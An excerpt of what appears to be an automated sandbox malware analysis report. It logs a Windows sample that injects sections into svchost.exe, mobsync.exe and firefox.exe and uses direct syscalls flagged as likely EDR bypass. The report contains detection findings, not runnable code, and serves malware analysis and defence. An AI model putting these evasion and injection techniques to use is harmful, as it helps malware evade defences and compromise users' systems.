                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]2_2_035AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]2_2_035AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355EB20 mov eax, dword ptr fs:[00000030h]2_2_0355EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355EB20 mov eax, dword ptr fs:[00000030h]2_2_0355EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F8B28 mov eax, dword ptr fs:[00000030h]2_2_035F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F8B28 mov eax, dword ptr fs:[00000030h]2_2_035F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DEBD0 mov eax, dword ptr fs:[00000030h]2_2_035DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03550BCB mov eax, dword ptr fs:[00000030h]2_2_03550BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03550BCB mov eax, dword ptr fs:[00000030h]2_2_03550BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03550BCB mov eax, dword ptr fs:[00000030h]2_2_03550BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03530BCD mov eax, dword ptr fs:[00000030h]2_2_03530BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03530BCD mov eax, dword ptr fs:[00000030h]2_2_03530BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03530BCD mov eax, dword ptr fs:[00000030h]2_2_03530BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03538BF0 mov eax, dword ptr fs:[00000030h]2_2_03538BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03538BF0 mov eax, dword ptr fs:[00000030h]2_2_03538BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03538BF0 mov eax, dword ptr fs:[00000030h]2_2_03538BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355EBFC mov eax, dword ptr fs:[00000030h]2_2_0355EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BCBF0 mov eax, dword ptr fs:[00000030h]2_2_035BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540BBE mov eax, dword ptr fs:[00000030h]2_2_03540BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540BBE mov eax, dword ptr fs:[00000030h]2_2_03540BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03536A50 mov eax, dword ptr fs:[00000030h]2_2_03536A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03536A50 mov eax, dword ptr fs:[00000030h]2_2_03536A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03536A50 mov eax, dword ptr fs:[00000030h]2_2_03536A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03536A50 mov eax, dword ptr fs:[00000030h]2_2_03536A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03536A50 mov eax, dword ptr fs:[00000030h]2_2_03536A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03536A50 mov eax, dword ptr fs:[00000030h]2_2_03536A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03536A50 mov eax, dword ptr fs:[00000030h]2_2_03536A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540A5B mov eax, dword ptr fs:[00000030h]2_2_03540A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540A5B mov eax, dword ptr fs:[00000030h]2_2_03540A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035ACA72 mov eax, dword ptr fs:[00000030h]2_2_035ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035ACA72 mov eax, dword ptr fs:[00000030h]2_2_035ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356CA6F mov eax, dword ptr fs:[00000030h]2_2_0356CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356CA6F mov eax, dword ptr fs:[00000030h]2_2_0356CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356CA6F mov eax, dword ptr fs:[00000030h]2_2_0356CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BCA11 mov eax, dword ptr fs:[00000030h]2_2_035BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03554A35 mov eax, dword ptr fs:[00000030h]2_2_03554A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03554A35 mov eax, dword ptr fs:[00000030h]2_2_03554A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356CA38 mov eax, dword ptr fs:[00000030h]2_2_0356CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356CA24 mov eax, dword ptr fs:[00000030h]2_2_0356CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355EA2E mov eax, dword ptr fs:[00000030h]2_2_0355EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03530AD0 mov eax, dword ptr fs:[00000030h]2_2_03530AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03564AD0 mov eax, dword ptr fs:[00000030h]2_2_03564AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03564AD0 mov eax, dword ptr fs:[00000030h]2_2_03564AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03586ACC mov eax, dword ptr fs:[00000030h]2_2_03586ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03586ACC mov eax, dword ptr fs:[00000030h]2_2_03586ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03586ACC mov eax, dword ptr fs:[00000030h]2_2_03586ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356AAEE mov eax, dword ptr fs:[00000030h]2_2_0356AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356AAEE mov eax, dword ptr fs:[00000030h]2_2_0356AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03568A90 mov edx, dword ptr fs:[00000030h]2_2_03568A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]2_2_0353EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]2_2_0353EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]2_2_0353EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]2_2_0353EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]2_2_0353EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]2_2_0353EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]2_2_0353EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]2_2_0353EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]2_2_0353EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03604A80 mov eax, dword ptr fs:[00000030h]2_2_03604A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03538AA0 mov eax, dword ptr fs:[00000030h]2_2_03538AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03538AA0 mov eax, dword ptr fs:[00000030h]2_2_03538AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03586AA4 mov eax, dword ptr fs:[00000030h]2_2_03586AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B0946 mov eax, dword ptr fs:[00000030h]2_2_035B0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D4978 mov eax, dword ptr fs:[00000030h]2_2_035D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D4978 mov eax, dword ptr fs:[00000030h]2_2_035D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BC97C mov eax, dword ptr fs:[00000030h]2_2_035BC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03556962 mov eax, dword ptr fs:[00000030h]2_2_03556962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03556962 mov eax, dword ptr fs:[00000030h]2_2_03556962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03556962 mov eax, dword ptr fs:[00000030h]2_2_03556962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0357096E mov eax, dword ptr fs:[00000030h]2_2_0357096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0357096E mov edx, dword ptr fs:[00000030h]2_2_0357096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0357096E mov eax, dword ptr fs:[00000030h]2_2_0357096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BC912 mov eax, dword ptr fs:[00000030h]2_2_035BC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03528918 mov eax, dword ptr fs:[00000030h]2_2_03528918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03528918 mov eax, dword ptr fs:[00000030h]2_2_03528918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AE908 mov eax, dword ptr fs:[00000030h]2_2_035AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AE908 mov eax, dword ptr fs:[00000030h]2_2_035AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B892A mov eax, dword ptr fs:[00000030h]2_2_035B892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C892B mov eax, dword ptr fs:[00000030h]2_2_035C892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A9D0 mov eax, dword ptr fs:[00000030h]2_2_0353A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A9D0 mov eax, dword ptr fs:[00000030h]2_2_0353A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A9D0 mov eax, dword ptr fs:[00000030h]2_2_0353A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A9D0 mov eax, dword ptr fs:[00000030h]2_2_0353A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A9D0 mov eax, dword ptr fs:[00000030h]2_2_0353A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A9D0 mov eax, dword ptr fs:[00000030h]2_2_0353A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035649D0 mov eax, dword ptr fs:[00000030h]2_2_035649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035FA9D3 mov eax, dword ptr fs:[00000030h]2_2_035FA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C69C0 mov eax, dword ptr fs:[00000030h]2_2_035C69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035629F9 mov eax, dword ptr fs:[00000030h]2_2_035629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035629F9 mov eax, dword ptr fs:[00000030h]2_2_035629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BE9E0 mov eax, dword ptr fs:[00000030h]2_2_035BE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B89B3 mov esi, dword ptr fs:[00000030h]2_2_035B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B89B3 mov eax, dword ptr fs:[00000030h]2_2_035B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B89B3 mov eax, dword ptr fs:[00000030h]2_2_035B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035309AD mov eax, dword ptr fs:[00000030h]2_2_035309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035309AD mov eax, dword ptr fs:[00000030h]2_2_035309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03560854 mov eax, dword ptr fs:[00000030h]2_2_03560854
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03534859 mov eax, dword ptr fs:[00000030h]2_2_03534859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03534859 mov eax, dword ptr fs:[00000030h]2_2_03534859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03542840 mov ecx, dword ptr fs:[00000030h]2_2_03542840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BE872 mov eax, dword ptr fs:[00000030h]2_2_035BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BE872 mov eax, dword ptr fs:[00000030h]2_2_035BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C6870 mov eax, dword ptr fs:[00000030h]2_2_035C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C6870 mov eax, dword ptr fs:[00000030h]2_2_035C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BC810 mov eax, dword ptr fs:[00000030h]2_2_035BC810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03552835 mov eax, dword ptr fs:[00000030h]2_2_03552835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03552835 mov eax, dword ptr fs:[00000030h]2_2_03552835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03552835 mov eax, dword ptr fs:[00000030h]2_2_03552835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03552835 mov ecx, dword ptr fs:[00000030h]2_2_03552835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03552835 mov eax, dword ptr fs:[00000030h]2_2_03552835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03552835 mov eax, dword ptr fs:[00000030h]2_2_03552835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356A830 mov eax, dword ptr fs:[00000030h]2_2_0356A830
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D483A mov eax, dword ptr fs:[00000030h]2_2_035D483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D483A mov eax, dword ptr fs:[00000030h]2_2_035D483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E8C0 mov eax, dword ptr fs:[00000030h]2_2_0355E8C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356C8F9 mov eax, dword ptr fs:[00000030h]2_2_0356C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356C8F9 mov eax, dword ptr fs:[00000030h]2_2_0356C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035FA8E4 mov eax, dword ptr fs:[00000030h]2_2_035FA8E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BC89D mov eax, dword ptr fs:[00000030h]2_2_035BC89D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03530887 mov eax, dword ptr fs:[00000030h]2_2_03530887
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352CF50 mov eax, dword ptr fs:[00000030h]2_2_0352CF50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352CF50 mov eax, dword ptr fs:[00000030h]2_2_0352CF50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352CF50 mov eax, dword ptr fs:[00000030h]2_2_0352CF50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352CF50 mov eax, dword ptr fs:[00000030h]2_2_0352CF50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352CF50 mov eax, dword ptr fs:[00000030h]2_2_0352CF50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352CF50 mov eax, dword ptr fs:[00000030h]2_2_0352CF50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356CF50 mov eax, dword ptr fs:[00000030h]2_2_0356CF50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03604F68 mov eax, dword ptr fs:[00000030h]2_2_03604F68
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D0F50 mov eax, dword ptr fs:[00000030h]2_2_035D0F50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B4F40 mov eax, dword ptr fs:[00000030h]2_2_035B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B4F40 mov eax, dword ptr fs:[00000030h]2_2_035B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B4F40 mov eax, dword ptr fs:[00000030h]2_2_035B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B4F40 mov eax, dword ptr fs:[00000030h]2_2_035B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D4F42 mov eax, dword ptr fs:[00000030h]2_2_035D4F42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355AF69 mov eax, dword ptr fs:[00000030h]2_2_0355AF69
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003EA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_003EA66C
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003D81AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_003D81AC
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003D8189 SetUnhandledExceptionFilter,0_2_003D8189

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exeNtCreateMutant: Direct from: 0x774635CCJump to behavior
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exeNtWriteVirtualMemory: Direct from: 0x77462E3CJump to behavior
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exeNtMapViewOfSection: Direct from: 0x77462D1CJump to behavior
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exeNtResumeThread: Direct from: 0x774636ACJump to behavior
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exeNtProtectVirtualMemory: Direct from: 0x77462F9CJump to behavior
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exeNtSetInformationProcess: Direct from: 0x77462C5CJump to behavior
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exeNtSetInformationThread: Direct from: 0x774563F9Jump to behavior
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exeNtProtectVirtualMemory: Direct from: 0x77457B2EJump to behavior
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exeNtNotifyChangeKey: Direct from: 0x77463C2CJump to behavior
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exeNtAllocateVirtualMemory: Direct from: 0x77462BFCJump to behavior
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exeNtQueryInformationProcess: Direct from: 0x77462C26Jump to behavior
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exeNtResumeThread: Direct from: 0x77462FBCJump to behavior
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exeNtReadFile: Direct from: 0x77462ADCJump to behavior
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exeNtQuerySystemInformation: Direct from: 0x77462DFCJump to behavior
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exeNtDelayExecution: Direct from: 0x77462DDCJump to behavior
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exeNtAllocateVirtualMemory: Direct from: 0x77463C9CJump to behavior
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exeNtClose: Direct from: 0x77462B6C
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exeNtCreateUserProcess: Direct from: 0x7746371CJump to behavior
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exeNtWriteVirtualMemory: Direct from: 0x7746490CJump to behavior
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exeNtAllocateVirtualMemory: Direct from: 0x774648ECJump to behavior
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exeNtQuerySystemInformation: Direct from: 0x774648CCJump to behavior
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exeNtQueryVolumeInformationFile: Direct from: 0x77462F2CJump to behavior
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exeNtReadVirtualMemory: Direct from: 0x77462E8CJump to behavior
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exeNtCreateKey: Direct from: 0x77462C6CJump to behavior
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exeNtSetInformationThread: Direct from: 0x77462B4CJump to behavior
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exeNtQueryAttributesFile: Direct from: 0x77462E6CJump to behavior
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exeNtDeviceIoControlFile: Direct from: 0x77462AECJump to behavior
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exeNtOpenSection: Direct from: 0x77462E0CJump to behavior
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exeNtCreateFile: Direct from: 0x77462FECJump to behavior
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exeNtOpenFile: Direct from: 0x77462DCCJump to behavior
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exeNtQueryInformationToken: Direct from: 0x77462CACJump to behavior
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exeNtTerminateThread: Direct from: 0x77462FCCJump to behavior
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exeNtAllocateVirtualMemory: Direct from: 0x77462BECJump to behavior
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exeNtOpenKeyEx: Direct from: 0x77462B9CJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\mobsync.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: NULL target: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: NULL target: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
